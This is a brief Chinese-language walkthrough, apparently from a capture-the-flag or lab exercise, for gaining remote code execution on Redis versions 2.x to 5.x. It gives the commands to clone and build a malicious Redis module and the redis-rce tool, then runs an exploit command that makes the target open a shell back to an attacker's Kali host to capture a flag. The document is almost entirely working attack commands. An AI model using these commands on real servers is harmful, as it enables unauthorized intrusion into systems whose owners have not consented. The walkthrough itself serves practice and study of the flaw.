漏洞影响的产品版本包括:Redis 2.x,3.x,4.x,5.x
下载工具 RedisModules-ExecuteCommand:
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
下载后进入目录,执行 make,进行编译,得到module.so 文件
下载redis-rce:
git clone https://github.com/Ridter/redis-rce.git
将module.so复制进redis-rce,
执行命令getshell,获得flag:(-r:靶机ip,-p 靶机端口;-L:kali的ip,-P:kali的端口)
python redis-rce.py -r 192.168.221.129 -p 37269 -L 192.168.1.228 -P 4444 -f module.so